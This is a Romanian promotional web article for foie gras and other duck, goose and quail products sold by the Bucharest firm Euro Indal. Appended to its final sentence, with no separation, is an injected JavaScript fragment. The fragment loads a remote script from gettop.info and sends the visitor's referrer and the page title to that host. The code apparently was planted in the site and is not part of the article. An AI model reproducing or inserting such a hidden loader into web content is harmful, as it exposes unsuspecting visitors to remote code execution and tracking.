foie gras

foie grasDaca ai pofta de ceva delicios sau daca vrei sa oferi unei persoane dragi un produs savuros si apetisant, te invitam sa incerci acum bloc de foie gras – un preparat delicios pe care il poti achizitiona din oferta companiei Euro Indal. Acum iti poti rasfata papilele gustative cu produse delicioase si de foarte buna calitate.

Gusturile gastronomice sunt diferite de la o persoana la asta. Cu toate acestea, indiferent de produsul in sine, fiecare persoana este interesata ca preparatul pe care il serveste sa fie, in primul rand, de calitate, adica sa contina ingrediente cat mai naturale. In acest sens, bloc de foie gras este o delicatese care a fost preparata cu ajutorul unor utilaje de ultima generatie si din ingrediente de o calitate ireprosabila.

Bloc de foie gras – un produs deosebit de delicios

Bloc de foie gras este doar unul din gama variata de sortimente ale acestei delicatese pe care le puteti achizitiona in cel mai simplu mod cu putinta din oferta celor de la Euro Indal. Bloc de foie gras este o specialitate cu traditie care a fost preparata pentru prima oara in anul 1954 in patria gastronomiei de lux – Franta. Bloc de foie gras este un ingredient esential in procesul de prepare a unor pateuri delicioase ce pot reprezenta oricand o gustare potrivita pentru un antreu rece. De asemeni, bloc de foie gras este un ingredient care se regaseste si in numeroase retete mai mult sau mai putin complicate.

Oricand ai pofta de o gustare simpla si rapida, nu ezita sa consumi aceasta specialitate culinara – bloc de foie gras – realizata din ficat proaspat de rata si de gasca. Gustul deosebit al acestui produs este dat de calitatea ficatului proaspat care a fost utilizat in procesul de fabricare. De asemeni, gustul de bloc de foie gras poate sa difere de la o reteta la alta. De exemplu, un foie gras realizat dupa reteta alsaciana va avea un gust mai condimentat, dat fiind faptul ca in prepararea acestei delicatese se va folosi un amestec de condimente precum: cuisoare, nucsoara, scortisoara etc. De bicei, bloc de foie gras se consuma la rece, ca antreu. Este un produs foarte hranitor si exceptional de gustos.

Oferta Euro Indal este foarte variata si cuprinde o multitudine de tipuri de foie gras (foie gras de gasca, foie gras de rata etc), dar si alte produse precum: carne de prepelita, piept de rata afumat, piept de rata crud, carne de porc Mangalita, confit de canard etc. Dupa cum vezi, de la aceasta firma din Bucuresti ai posibilitatea de a cumpara o varietate de produse delicioase si de calitate.

Nu mai sta pe ganduri si achizitioneaza acum bloc de foie gras de la Euro Indal. Acest produs atat de delicios iti va satisface poftele culinare si iti va reprezenta un mic dejun sanatos si copios. De asemeni, cu atentie si determinare, ai posibilitatea de a folosi bloc de foie gras in prepararea unor retete ceva mai elaborate. Fara indoiala cei dragi tie iti vor aprecia talentul culinar si vor gusta cu profta din preparatele tale.s.src=’http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;